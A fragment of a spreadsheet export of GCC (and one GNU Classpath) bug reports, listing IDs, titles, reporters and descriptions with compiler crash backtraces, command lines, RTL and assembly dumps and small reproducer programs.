    <t>GCC-60650</t>
  </si>
  <si>
    <t>[ARM] LRA ICE in assign_by_spills</t>
  </si>
  <si>
    <t>reported when building linux btrfs module.
slightly reduced preprocessed test case  attached.
command line : 
cc1 -O2 -fno-omit-frame-pointer -mabi=apcs-gnu -march=armv7-a file-item.i
cc1 outputs :
In file included from /git/arm-soc/fs/btrfs/transaction.h:21:0
                 from /git/arm-soc/fs/btrfs/file-item.c:25:
/git/arm-soc/fs/btrfs/btrfs_inode.h: In function â€˜truncate_one_csumâ€™:
/git/arm-soc/fs/btrfs/btrfs_inode.h:214:1: internal compiler error: in assign_by_spills at lra-assigns.c:1286
0x9ddf78 assign_by_spills
	/work/sources/gcc-fsf/trunk/gcc/lra-assigns.c:1286
0x9de921 lra_assign()
	/work/sources/gcc-fsf/trunk/gcc/lra-assigns.c:1444
0x9d865a lra(_IO_FILE*)
	/work/sources/gcc-fsf/trunk/gcc/lra.c:2370
0x98669b do_reload
	/work/sources/gcc-fsf/trunk/gcc/ira.c:5457
0x9869e4 rest_of_handle_reload
	/work/sources/gcc-fsf/trunk/gcc/ira.c:5598
0x986a2e execute
	/work/sources/gcc-fsf/trunk/gcc/ira.c:5627</t>
  </si>
  <si>
    <t>GCC-84105</t>
  </si>
  <si>
    <t>[8 regression] Segmentation fault in pp_tree_identifier() during LTO</t>
  </si>
  <si>
    <t>I got an ICE while building the linux kernel module net/sctp/sctp.ko with i386-linux-gcc-8.0.1 currently using r257114. A slightly older gcc-8.0.0 (dated 20180107 exact revision unknown) doesn't have this problem.
  /bin/bash /git/arm-soc/scripts/gcc-ld -fuse-linker-plugin -flto=jobserver -flto  -fno-strict-aliasing -fno-fat-lto-objects -Wno-attribute-alias -fwhole-program  -fno-strict-aliasing -fdump-ipa-cgraph -fdump-ipa-inline-details -fipa-cp-clone -r -m elf_i386 -T /git/arm-soc/scripts/module-common.lds --build-id  -o net/sctp/sctp.ko net/sctp/sctp.o net/sctp/sctp.mod.o   true
during IPA pass: inline
dump file: net/sctp/sctp.ko.ltrans0.079i.inline
/git/arm-soc/net/sctp/sm_sideeffect.c: In function 'sctp_do_sm':
/git/arm-soc/net/sctp/sm_sideeffect.c:1155:5: internal compiler error: Segmentation fault
 int sctp_do_sm(struct net *net enum sctp_event event_type
     ^
0xa42b7f crash_signal
	/home/arnd/git/gcc/gcc/toplev.c:325
0xaf0659 pp_tree_identifier(pretty_printer* tree_node*)
	/home/arnd/git/gcc/gcc/tree-pretty-print.c:4006
0xaf0966 dump_decl_name
	/home/arnd/git/gcc/gcc/tree-pretty-print.c:261
0xaf42ea dump_generic_node(pretty_printer* tree_node* int unsigned long bool)
	/home/arnd/git/gcc/gcc/tree-pretty-print.c:1826
0xaf769a print_declaration(pretty_printer* tree_node* int unsigned long)
	/home/arnd/git/gcc/gcc/tree-pretty-print.c:3333
0xaf7997 print_generic_decl(_IO_FILE* tree_node* unsigned long)
	/home/arnd/git/gcc/gcc/tree-pretty-print.c:122
0xb4603a dump_scope_block
	/home/arnd/git/gcc/gcc/tree-ssa-live.c:647
0xb471b9 dump_scope_blocks(_IO_FILE* unsigned long)
	/home/arnd/git/gcc/gcc/tree-ssa-live.c:678
0xb471b9 remove_unused_locals()
	/home/arnd/git/gcc/gcc/tree-ssa-live.c:870
0x97af44 execute_function_todo
	/home/arnd/git/gcc/gcc/passes.c:1972
0x97b8b9 execute_todo
	/home/arnd/git/gcc/gcc/passes.c:2048
0x97dac5 execute_one_ipa_transform_pass
	/home/arnd/git/gcc/gcc/passes.c:2245
0x97dac5 execute_all_ipa_transforms()
	/home/arnd/git/gcc/gcc/passes.c:2281
0x6d681c cgraph_node::expand()
	/home/arnd/git/gcc/gcc/cgraphunit.c:2132
0x6d7b38 expand_all_functions
	/home/arnd/git/gcc/gcc/cgraphunit.c:2275
0x6d7b38 symbol_table::compile()
	/home/arnd/git/gcc/gcc/cgraphunit.c:2624
0x656c51 lto_main()
	/home/arnd/git/gcc/gcc/lto/lto.c:3349
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
I have not been able to create a simple test case for it but can provide steps for reproducing or help test patches. If necessary I can do a bisection but maybe someone can see from the backtrace what is happening or has a duplicate bugreport.
From what I can tell the ICE is caused by a typedef inside of a function moving the typedef outside of the function avoids the problem. See the source code at:
https://elixir.free-electrons.com/linux/v4.15/source/net/sctp/sm_sideeffect.c#L1172</t>
  </si>
  <si>
    <t>arnd</t>
  </si>
  <si>
    <t>GCC-66507</t>
  </si>
  <si>
    <t>Crash on compiling llvm plugin</t>
  </si>
  <si>
    <t>When developing/compiling a llvm clang 3.7 plugin with gcc 4.9 on debian unstable I encounted a crash. I thought to report this because maybe it would be useful.
this error did not recoccur when trying to compiling again. 
My internal bug report is here:
https://github.com/h4ck3rm1k3/traces/issues/2
Here is the backtrace:
/bin/bash ../libtool  --tag=CXX   --mode=compile g++ -DHAVE_CONFIG_H -I. -I..  -I ../include  -I/usr/lib/llvm-3.7/include  -DNDEBUG -D_GNU_SOURCE -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -g -O2 -fomit-frame-pointer -fPIC -std=c++11   -g -O2 -MT trace_instrumentor.lo -MD -MP -MF .deps/trace_instrumentor.Tpo -c -o trace_instrumentor.lo trace_instrumentor.cpp
libtool: compile:  g++ -DHAVE_CONFIG_H -I. -I.. -I ../include -I/usr/lib/llvm-3.7/include -DNDEBUG -D_GNU_SOURCE -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -g -O2 -fomit-frame-pointer -fPIC -std=c++11 -g -O2 -MT trace_instrumentor.lo -MD -MP -MF .deps/trace_instrumentor.Tpo -c trace_instrumentor.cpp  -fPIC -DPIC -o .libs/trace_instrumentor.o
In file included from /usr/lib/llvm-3.7/include/clang/AST/Attr.h:150:0
from /usr/lib/llvm-3.7/include/clang/AST/DeclCXX.h:20
from /usr/lib/llvm-3.7/include/clang/AST/DeclVisitor.h:17
from trace_instrumentor.cpp:26:
/usr/lib/llvm-3.7/include/clang/AST/Attrs.inc:4263:7: internal compiler error: Segmentation fault
class ObjCExceptionAttr : public InheritableAttr {
^</t>
  </si>
  <si>
    <t>JamesMikeDuPont</t>
  </si>
  <si>
    <t>GCC-41380</t>
  </si>
  <si>
    <t>lto.exp leaves temporary files behind</t>
  </si>
  <si>
    <t>After running make check-gcc RUNTESTFLAGS=lto.exp we have
ls testsuite/gcc/
ccnMRJwL-c_lto_20090116_0.o.lto.o  gcc-dg-lto-20090206-1-01
c_lto_20090116_0.s                 gcc-dg-lto-20090206-2-01
gcc-dg-lto-20081120-1-01           gcc-dg-lto-20090219-01
gcc-dg-lto-20081120-2-01           gcc-dg-lto-20090312-01
gcc-dg-lto-20081126-01             gcc-dg-lto-20090312-11
gcc-dg-lto-20081204-1-01           gcc-dg-lto-20090312-21
gcc-dg-lto-20081204-2-01           gcc-dg-lto-20090312-31
gcc-dg-lto-20081212-1-01           gcc-dg-lto-20090914-1-01
gcc-dg-lto-20081224-01             gcc.log
gcc-dg-lto-20090126-1-01           gcc.sum
gcc-dg-lto-20090126-2-01           site.exp
(after fixing PR41379)</t>
  </si>
  <si>
    <t>GCC-48031</t>
  </si>
  <si>
    <t>[4.4 Regression] gcc.c-torture/compile/pr42956.c ICEs gcc on m68k-linux ivopts related?</t>
  </si>
  <si>
    <t>The pr42956.c test case ICEs gcc 4.5 and 4.4 on m68k-linux:
&gt; gcc/xgcc -Bgcc -O1 -S /.../gcc/testsuite/gcc.c-torture/compile/pr42956.c
/.../gcc/testsuite/gcc.c-torture/compile/pr42956.c: In function 'Split':
/.../gcc/testsuite/gcc.c-torture/compile/pr42956.c:10:6: error: expected an SSA_NAME object
/.../gcc/testsuite/gcc.c-torture/compile/pr42956.c:10:6: error: in statement
D.2041_132 = D.1987 /[ex] 2
/.../gcc/testsuite/gcc.c-torture/compile/pr42956.c:10:6: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is with a cross to m68k-linux and --enable-checking=yes with --enable-checking=release the compiler segfaults instead.
Compiling with -O1 -fno-ivopts or -O0 eliminates the ICE.
This bug occurs with gcc-4.4.5 and gcc-4.5.2.  It does not occur with gcc-4.3.5.  For gcc-4.6 it stopped occurring after the big MEM_REF update in r161655.</t>
  </si>
  <si>
    <t>GCC-56228</t>
  </si>
  <si>
    <t>[4.8 Regression] Indirect call fails to assemble</t>
  </si>
  <si>
    <t>short a[14] = { 1 2 }
short b[15] = { 3 4 }
int
foo ()
{
  void (*fna) (void) = (void (*) (void)) a
  void (*fnb) (void) = (void (*) (void)) b
  fna ()
  fnb ()
  return a[1] == b[1]
}
fails on ppc64 because call_indirect_aix64bit pattern uses m constraint for 64-bit loads instead of Y constraint.</t>
  </si>
  <si>
    <t>GCC-82081</t>
  </si>
  <si>
    <t>Tail call optimisation of noexcept function leads to exception allowed through</t>
  </si>
  <si>
    <t>When a noexcept function gets optimised with tail-call the frame disappears so the unwinder cannot know that the function was noexcept and thus std::terminate() should be called.
Code:
$ cat throw.cpp
void noexcept_function() noexcept
bool false_condition = false
void will_throw()
{
    throw 1
}
void wrapper()
{
    noexcept_function()
    if (false_condition)
        throw 42
}
$ cat main.cpp
#include 
void will_throw()  // throws int
void wrapper()
extern bool false_condition
void noexcept_function() noexcept { will_throw() }
int main()
{
    try {
        wrapper()
    } catch (int v) {
        std::cout &lt;&lt; Caught  &lt;&lt; v
        return v
    }
    return 0
}
By bouncing around translation units we prevent inlining. The compiler cannot know that wrapper() calls noexcept_function() which calls will_throw().
In debug mode the program behaves as expected
$ g++ -O0 -g throw.cpp main.cpp
$ ./a.out
terminate called after throwing an instance of 'int'
[1]    46552 abort (core dumped)  ./a.out
(gdb) bt
#0  0x00007f9df0ce1a90 in raise () from /lib64/libc.so.6
#1  0x00007f9df0ce30f6 in abort () from /lib64/libc.so.6
#2  0x00007f9df1615235 in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib64/libstdc++.so.6
#3  0x00007f9df1613026 in ?? () from /usr/lib64/libstdc++.so.6
#4  0x00007f9df1611fe9 in ?? () from /usr/lib64/libstdc++.so.6
#5  0x00007f9df1612958 in __gxx_personality_v0 () from /usr/lib64/libstdc++.so.6
#6  0x00007f9df10633a3 in ?? () from /lib64/libgcc_s.so.1
#7  0x00007f9df10638b0 in _Unwind_RaiseException () from /lib64/libgcc_s.so.1
#8  0x00007f9df16132a6 in __cxa_throw () from /usr/lib64/libstdc++.so.6
#9  0x00000000004009ed in will_throw () at throw.cpp:6
#10 0x0000000000400a2f in noexcept_function () at main.cpp:7
#11 0x00000000004009f6 in wrapper () at throw.cpp:11
#12 0x0000000000400a40 in main () at main.cpp:12
However when optimised we see that the exception thrown from will_throw() does pass through and is caught by main():
$ g++ -O2 -g throw.cpp main.cpp
$ ./a.out 
Caught 1
(gdb) disass noexcept_function
Dump of assembler code for function noexcept_function():
   0x0000000000400b10 :     jmpq   0x400aa0 
I see two possible paths to solving this.
1) forbid tail-call optimisation of a noexcept(false) call in a noexcept function so that there is a frame in place for the unwinder to find. That is the noexcept_function should be:
  sub  %rsp 8
  call will_throw()
  retq
(GCC generates this under some conditions like placing all functions in the same TU but using -fno-inline)
2) wrap the call point of the noexcept function (in this case wrapper()) with an EH table that enforces that no exceptions should come out of it.
The first solution implies a performance penalty due to optimisation that could not be used. If you choose to implement this please try to disable this correction under -fno-exceptions.
The second solution allows the runtime performance at the expense of expanding EH tables around every noexcept function.
Neither solution completely solves the problem for mixed-age code in different libraries: solution 1 solves the problem if the callee is recompiled but lets the problem still happen if only the caller is recompiled. Solution 2 is the dual converse: if the caller is recompiled the problem is solved but the problem still happens if only the callee is recompiled.</t>
  </si>
  <si>
    <t>GCC-3431</t>
  </si>
  <si>
    <t>ice while emitting debug info</t>
  </si>
  <si>
    <t>internal compiler error while doing
c++ -g instancemanager.ii -c
In file included from instancemanager.cc:12:
../utility/manager.hh: In instantiation of `wRegisteringManager':
../engine/instancemanager.hh:31:   instantiated from `wInstanceManager'
../engine/instancemanager.hh:31:   instantiated from here
../utility/manager.hh:27: Internal compiler error in dbxout_type at dbxout.c:
   1635
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc-3.0
Environment:
System: Linux dendrite 2.4.4 #4 Don Mai 3 00:14:41 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ./configure --prefix=/opt/gcc-3.0/</t>
  </si>
  <si>
    <t>GCC-71907</t>
  </si>
  <si>
    <t>[6 regression] missing buffer overflow warnings with -flto</t>
  </si>
  <si>
    <t>The following program overflows the local character buffer.  When it's compiled without the -flto option the buffer overflow is diagnosed with a warning.  But when it's compiled with the -flto option the diagnostic is not issued.
$ (CC='/build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc' CFLAGS='-D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -Wpedantic' set -x cat xyz.c  do $CC $CFLAGS -c $lto xyz.c  done)
+ cat xyz.c
#include 
void f (char *d const char *s)
{
  strcpy (d s)
}
int main (void)
{
  const char s[] = 12345678
  char d [4]
  f (d s)
  __builtin_printf (%s\n d)
}
+ for lto in ''\'''\''' -flto
+ /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -Wpedantic -c xyz.c
In file included from /usr/include/string.h:639:0
                 from xyz.c:1:
In function â€˜strcpyâ€™
    inlined from â€˜mainâ€™ at xyz.c:5:3:
/usr/include/bits/string3.h:104:10: warning: call to __builtin___memcpy_chk will always overflow destination buffer
   return __builtin___strcpy_chk (__dest __src __bos (__dest))
          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -Wpedantic xyz.o
+ for lto in ''\'''\''' -flto
+ /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -Wpedantic -c -flto xyz.c
+ /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -Wpedantic -flto xyz.o</t>
  </si>
  <si>
    <t>GCC-16261</t>
  </si>
  <si>
    <t>[3.4 regression] ICE: output_die at dwarf2out.c:6628</t>
  </si>
  <si>
    <t xml:space="preserve">
G++ 3.4 enjoys an ICE when compiling the following code with -g:
namespace temp
{
  template 
  struct Map
  {
  }
  typedef Map  TempMap
}
extern temp::TempMap tempmap
void
instructions_display (void)
{
  struct NolimipsTempMap
    : public temp::TempMap
  {
    NolimipsTempMap (const temp::TempMap &amp;tm)
      : temp::TempMap (tm)
    {
    }
  }
  NolimipsTempMap tm (tempmap)
}
No other version of GCC I use faces this problem (3.3 or 3.5).
Environment:
System: Linux tchernobyl 2.4.18-bf2.4 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/lrde/stud/burrus_n/work/lrde/ext/gcc/configure --prefix=/home/lrde/lrde/usr/gcc-3.4 --enable-languages=cc++
How-To-Repeat:
% g++-3.4 -c tasks.cc
% g++-3.4 -c -g tasks.cc
tasks.cc:27: internal compiler error: in output_die at dwarf2out.c:6628
SVP soumettre un rapport complet d'anomalies
avec le source prÃ©-traitÃ© si cela est appropriÃ©.
Consulter  pour les instructions.</t>
  </si>
  <si>
    <t>akim</t>
  </si>
  <si>
    <t>GCC-560</t>
  </si>
  <si>
    <t>[Solaris 8 x86] static code segfaults before main</t>
  </si>
  <si>
    <t>If you compile static code any code with gcc on Solaris 8
on x86 architecture the resulting binary will segfault
before reaching user code. 
To be more precise in _init ()
Release:
2.95.2
Environment:
Solaris 8 x86
How-To-Repeat:
# cat hello.c
#include 
int main(void)
{
        printf(Hello World!\n)
}
# gcc -static -g -o hello hello.c
# ./hello 
zsh: segmentation fault (core dumped)  ./hello
# gdb ./hello core 
GNU gdb 4.18
Copyright 1998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386-pc-solaris2.8...
Core was generated by `./hello'.
Program terminated with signal 11 Segmentation Fault.
#0  0x8069815 in _init ()
(gdb) disass
Dump of assembler code for function _init:
0x8069800 :      call   0x8050198 
0x8069805 :    nop    
0x8069806 :    nop    
0x8069807 :    nop    
0x8069808 :    nop    
0x8069809 :    nop    
0x806980a :   nop    
0x806980b :   nop    
0x806980c :   nop    
0x806980d :   nop    
0x806980e :   nop    
0x806980f :   nop    
0x8069810 :   call   0x8050200 
0x8069815 :   add    %al(%eax)
0x8069817 :   add    %al(%eax)
0x8069819 :   add    %al(%eax)
0x806981b :   add    %al(%eax)
0x806981d :   add    %al(%eax)
0x806981f :   add    %ch%al
0x8069821 :   xchg   %edi%edi
0x8069823 :   (bad)  
0x8069824 :   call   *0x90909090(%eax)
0x806982a :   nop    
0x806982b :   nop    
0x806982c :   nop    
0x806982d :   nop    
0x806982e :   nop    
---Type  to continue or q  to quit---q
Quit
(gdb) inf reg
eax            0x0      0
ecx            0x808497c        134760828
edx            0x8047d80        134512000
ebx            0x0      0
esp            0x8047d5c        0x8047d5c
ebp            0x8047d74        0x8047d74
esi            0x0      0
edi            0x0      0
eip            0x8069815        0x8069815
eflags         0x10246  66118
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x0      0
(gdb) quit
#</t>
  </si>
  <si>
    <t>rami.lehti</t>
  </si>
  <si>
    <t>GCC-83128</t>
  </si>
  <si>
    <t>Unable to optimize {mc}alloc when strings builtin are used</t>
  </si>
  <si>
    <t>Currently gcc with -03 is able to optimize 
----------
char f() {
  char * i = (char*)__builtin_malloc(100)
 i[0] = 'a'
 return i[0]
}
----------
to
----------
        mov     al 97
        ret
But is unable to do the same when string builtins are used with either malloc or calloc.
---------
char f() {
  char * i = (char*)__builtin_malloc(100)
  __builtin_memcpy(i a 1)
  return i[0]
}
---------</t>
  </si>
  <si>
    <t>GCC-9226</t>
  </si>
  <si>
    <t>GCSE breaking argument passing</t>
  </si>
  <si>
    <t>GCSE is replacing references to the stack pointer by a different register
during argument passing.
Before GCSE:
(insn 24 23 28 0 0x2000000002410840 (set (reg/v/f:SI 36)
        (reg/f:SI 15 %sp)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 28 24 29 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/f:SI 15 %sp)) [0 S4 A16])
        (reg/v:SI 33)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 29 28 30 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/f:SI 15 %sp)) [0 S4 A16])
        (reg/v/f:SI 29)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 30 29 31 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/f:SI 15 %sp)) [0 S4 A16])
        (reg/v/f:SI 36)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 31 30 32 0 0x2000000002410840 (set (reg/f:SI 44)
        (symbol_ref:SI (memcpy))) 29 {*m68k.md:978} (nil)
    (expr_list:REG_EQUAL (symbol_ref:SI (memcpy))
        (nil)))
After GCSE:
(insn 24 23 28 0 0x2000000002410840 (set (reg/v/f:SI 36)
        (reg/f:SI 15 %sp)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 28 24 29 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/f:SI 15 %sp)) [0 S4 A16])
        (reg/v:SI 33)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 29 28 30 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/v/f:SI 36)) [0 S4 A16])
        (reg/v/f:SI 29)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 30 29 31 0 0x2000000002410840 (set (mem/f:SI (pre_dec:SI (reg/v/f:SI 36)) [0 S4 A16])
        (reg/v/f:SI 36)) 29 {*m68k.md:978} (nil)
    (nil))
(insn 31 30 32 0 0x2000000002410840 (set (reg/f:SI 44)
        (symbol_ref:SI (memcpy))) 29 {*m68k.md:978} (nil)
    (expr_list:REG_EQUAL (symbol_ref:SI (memcpy))
        (nil)))
(reg 36) is not a valid replacement for (reg 15).
Release:
3.4 20030107 (experimental)
Environment:
System: Linux sykes 2.4.19-SMP #1 SMP Wed Dec 11 22:55:37 UTC 2002 ia64 unknown unknown GNU/Linux
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: m68k-unknown-linux-gnu
configured with: /cvs/gcc/configure --with-gcc-version-trigger=/cvs/gcc/gcc/version.c --host=ia64-unknown-linux --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --enable-shared
How-To-Repeat:
$ cat alloca.c
typedef unsigned int size_t
void *memcpy (void *__restrict const void *__restrict size_t)
size_t strlen (const char *)
int printf (const char * ...)
# define strdupa(s)							      \
  (__extension__							      \
    ({									      \
      __const char *__old = (s)					      \
      size_t __len = strlen (__old) + 1				      \
      char *__new = (char *) __builtin_alloca (__len)			      \
      (char *) memcpy (__new __old __len)				      \
    }))
void
foo (const char *x)
{
  size_t nx
  char *y = strdupa (x)
  nx = 1
  while (*y)
    {
      if (*y == ':' || *y == '')
	++nx
      y++
    }
  printf (%s %zu y nx)
}
$ m68k-linux-gcc -S -O2 alloca.c</t>
  </si>
  <si>
    <t>GCC-38166</t>
  </si>
  <si>
    <t>g++.dg/ext/visibility/class1.C fails at -m64 on i686-apple-darwin9</t>
  </si>
  <si>
    <t>The g++.dg/ext/visibility/class1.C test case fails at -m64 on i686-apple-darwin9 as follows...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/testsuite/g++/../../g++ -B/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/testsuite/g++/../../ /sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/gcc/testsuite/g++.dg/ext/visibility/class1.C  -nostdinc++ -I/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/i686-apple-darwin10/x86_64/libstdc++-v3/include/i686-apple-darwin10 -I/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/i686-apple-darwin10/x86_64/libstdc++-v3/include -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/libsupc++ -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/include/backward -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/testsuite/util -fmessage-length=0  -fpic  -S  -m64 -o class1.s    (timeout = 300)
PASS: g++.dg/ext/visibility/class1.C (test for excess errors)
FAIL: g++.dg/ext/visibility/class1.C scan-assembler InitEv@PLT|indirect_symbol.*InitEv</t>
  </si>
  <si>
    <t>CLASSPATH-26758</t>
  </si>
  <si>
    <t>GdkFontPeer.getPostScriptFontName unimplemented</t>
  </si>
  <si>
    <t>The Openstreetmap applet expects java.awt.Font.getPSFontName() to return something non-null.</t>
  </si>
  <si>
    <t>GCC-36728</t>
  </si>
  <si>
    <t>[stack]: gdb doesn't work with stack alignment</t>
  </si>
  <si>
    <t>gdb doesn't work with stack alignment.</t>
  </si>
  <si>
    <t>xuepeng.guo</t>
  </si>
  <si>
    <t>GCC-46442</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 166625 failed to bootstrap</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 166625:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg00514.html
gave
../../src-trunk/gcc/fortran/options.c: In function 'gfc_post_options':
../../src-trunk/gcc/fortran/options.c:261:19: error: 'flag_whopr' undeclared (first use in this function)
../../src-trunk/gcc/fortran/options.c:261:19: note: each undeclared identifier is reported only once for each function it appears in
make[6]: *** [fortran/options.o] Error 1</t>
  </si>
  <si>
    <t>GCC-60191</t>
  </si>
  <si>
    <t>test case gfortran.dg/dynamic_dispatch_1/3.f03 fail on ARMv7</t>
  </si>
  <si>
    <t xml:space="preserve">This test case fails only with -O0 that's interesting.
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ed/gnu/arm-linux-gnueabihf/libexec/gcc/armv7l-unknown-linux-gnueabihf/4.9.0/lto-wrapper
Target: armv7l-unknown-linux-gnueabihf
Configured with: ../gcc-4.9-20140209/configure --prefix=/home/ed/gnu/arm-linux-gnueabihf --enable-languages=cc++objcobj-c++fortranadago --with-arch=armv7-a --with-tune=cortex-a9 --with-fpu=vfpv3-d16 --with-float=hard
Thread model: posix
gcc version 4.9.0 20140209 (experimental) (GCC)
Debuging the first test case shows this:
The following function gets called:
(gdb) disass make_real
Dump of assembler code for function __m_MOD_make_real:
   0x000086d8 :	push	{r11}		 (str r11 [sp #-4]!)
   0x000086dc :	add	r11 sp #0
   0x000086e0 :	sub	sp sp #20
   0x000086e4 :	str	r0 [r11 #-16]
   0x000086e8 :	ldr	r3 [r11 #-16]
   0x000086ec :	ldr	r3 [r3]
   0x000086f0 :	ldr	r3 [r3]
   0x000086f4 :	vmov	s15 r3
   0x000086f8 :	vcvt.f32.s32	s15 s15
   0x000086fc :	vstr	s15 [r11 #-8]
   0x00008700 :	ldr	r3 [r11 #-8]
   0x00008704 :	vmov	s15 r3
   0x00008708 :	vmov.f32	s0 s15
   0x0000870c :	sub	sp r11 #0
   0x00008710 :	pop	{r11}		 (ldr r11 [sp] #4)
   0x00008714 :	bx	lr
the result is returned in register s0 (42.0)
but the caller expects it in register r0.
   0x00008754 :	push	{r11 lr}
   0x00008758 :	add	r11 sp #4
   0x0000875c :	sub	sp sp #8
   0x00008760 :	movw	r3 #35292	 0x89dc
   0x00008764 :	movt	r3 #0
   0x00008768 :	str	r3 [r11 #-8]
   0x0000876c :	movw	r3 #3032	 0xbd8
   0x00008770 :	movt	r3 #1
   0x00008774 :	str	r3 [r11 #-12]
   0x00008778 :	ldr	r3 [r11 #-8]
   0x0000877c :	ldr	r3 [r3 #32]
   0x00008780 :	sub	r2 r11 #12
   0x00008784 :	mov	r0 r2
   0x00008788 :	blx	r3
   0x0000878c :	vmov	s14 r0
=&gt; 0x00008790 :	vldr	s15 [pc #400]	 0x8928 
   0x00008794 :	vcmp.f32	s14 s15
   0x00008798 :	vmrs	APSR_nzcv fpscr
   0x0000879c :	beq	0x87a4 
   0x000087a0 :	bl	0x8428 </t>
  </si>
  <si>
    <t>GCC-31103</t>
  </si>
  <si>
    <t>[4.3 Regression] same canonical type node for VLAs</t>
  </si>
  <si>
    <t>warning: same canonical type node for different types - with long int
% /usr/lib/gcc-snapshot/bin/g++ -c -g -O2 icu-dtfmtsym.ii 
dtfmtsym.cpp: In member function 'void icu_3_6::DateFormatSymbols::setMonths(const icu_3_6::UnicodeStr
ing* int32_t icu_3_6::DateFormatSymbols::DtContextType icu_3_6::DateFormatSymbols::DtWidthType)':
dtfmtsym.cpp:738: warning: same canonical type node for different types icu_3_6::UnicodeString [(long
int)iftmp.95] and icu_3_6::UnicodeString [(long int)iftmp.95]
 &lt;array_type 0x2b142b100600
    type &lt;record_type 0x2b142b13b600 UnicodeString sizes-gimplified addressable asm_written tree_2 nee
ds-constructing type_1 type_4 type_5 type_6 BLK
        size 
        unit size 
        align 64 symtab 722782848 alias set 4 canonical type 0x2b142b13b600
        fields 
            ignored decl_6 BLK file ../common/unicode/unistr.h line 188
            size 
            unit size 
            align 64 offset_align 128
            offset 
            bit offset  context &lt;record_type 0x2b142b
13b600 UnicodeString&gt; chain &gt; context &lt;namespace_decl 0x2b142b11
a340 icu_3_6&gt;
       needs-constructor needs-destructor X() X(constX&amp;) new new[] delete delete[] this=(X&amp;) n_parents
=1 use_template=0 interface-only
        pointer_to_this  reference_to_this &lt;reference_type 0x2b142b13f240
&gt; chain &gt;
    needs-constructing type_4 BLK
    size &lt;mult_expr 0x2b142b593080
        type &lt;integer_type 0x2b142aa210c0 bit_size_type public unsigned sizetype DI size &lt;integer_cst
0x2b142aa0fb70 64&gt; unit size 
            align 64 symtab 0 alias set -1 canonical type 0x2b142aa21e40 precision 64 min &lt;integer_cst
 0x2b142aa30360 0&gt; max &gt;
        side-effects invariant
        arg 0 
            side-effects invariant
...</t>
  </si>
  <si>
    <t>GCC-71321</t>
  </si>
  <si>
    <t>[6 Regression] x86: worse code for uint8_t % 10 and / 10</t>
  </si>
  <si>
    <t>If we have an integer (0..99) we can modulo and divide by 10 to get two decimal digits then convert to a pair of ASCII bytes with a newline by adding `00\n`.   When replacing div and mod with a multiplicative inverse gcc 6.1 uses more instructions than gcc 5.3 due to poor choices.
See also https://godbolt.org/g/vvS5J6
#include 
// assuming little-endian
__attribute__((always_inline)) 
unsigned cvt_to_2digit(uint8_t i uint8_t base) {
  return ((i / base) | (uint32_t)(i % base)&lt;&lt;8)
}
  // movzbl %dil%eax    # 5.3 and 6.1 with -O3 -march=haswell
  // div    %sil
  // movzwl %ax%eax
// at -Os gcc uses a useless  AND eax 0xFFF instead of a movzx eaxax.  I think to avoid partial-register stalls?
unsigned cvt_to_2digit_ascii(uint8_t i) {
  return cvt_to_2digit(i 10) + 0x0a3030    // + 00\n converts to ASCII
}
Compiling with -O3 -march=haswell
        ## gcc 5.3                         ## gcc 6.1
